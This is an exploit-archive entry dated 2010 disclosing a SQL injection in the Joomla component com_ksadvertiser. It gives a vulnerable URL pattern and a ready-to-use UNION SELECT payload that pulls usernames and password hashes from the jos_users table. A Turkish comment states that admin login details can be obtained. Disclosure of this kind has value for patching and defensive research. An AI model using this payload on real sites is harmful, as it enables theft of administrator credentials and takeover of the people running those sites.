[Exploit] [Remote] [Local] [Web Apps] [Dos/Poc] [Shellcode] [RSS]
# Title : Joomla Component com_ksadvertiser SQL Injection Vulnerability
# Published : 2010-01-08
# Author : FL0RiX
# Previous Title : CU Village CMS Site 1.0 (print_view) Blind SQL Injection Vulnerability
# Next Title : DELTAScripts PHPLinks (catid) SQL Injection Vulnerability
########################################################################
# Joomla Component com_ksadvertiser SQL Injection Vulnerability
########################################################################
# Author :FL0RiX
#
# Name : com_ksadvertiser
#
# Bug Type : SQL Injection
#
# Infection : Admin login bilgileri alinabilir.
#
# Demo Vuln :
#
# http://server/index.php?option=com_ksadvertiser&pid=[EXPLOIT]&task=showcats
#
#EXPLOIT : null/**/union/**/select/**/1,2,3,4,concat(username,0x3a,password),6,7,8,9,10,11,12,13,14/**/from/**/jos_users--
########################################################################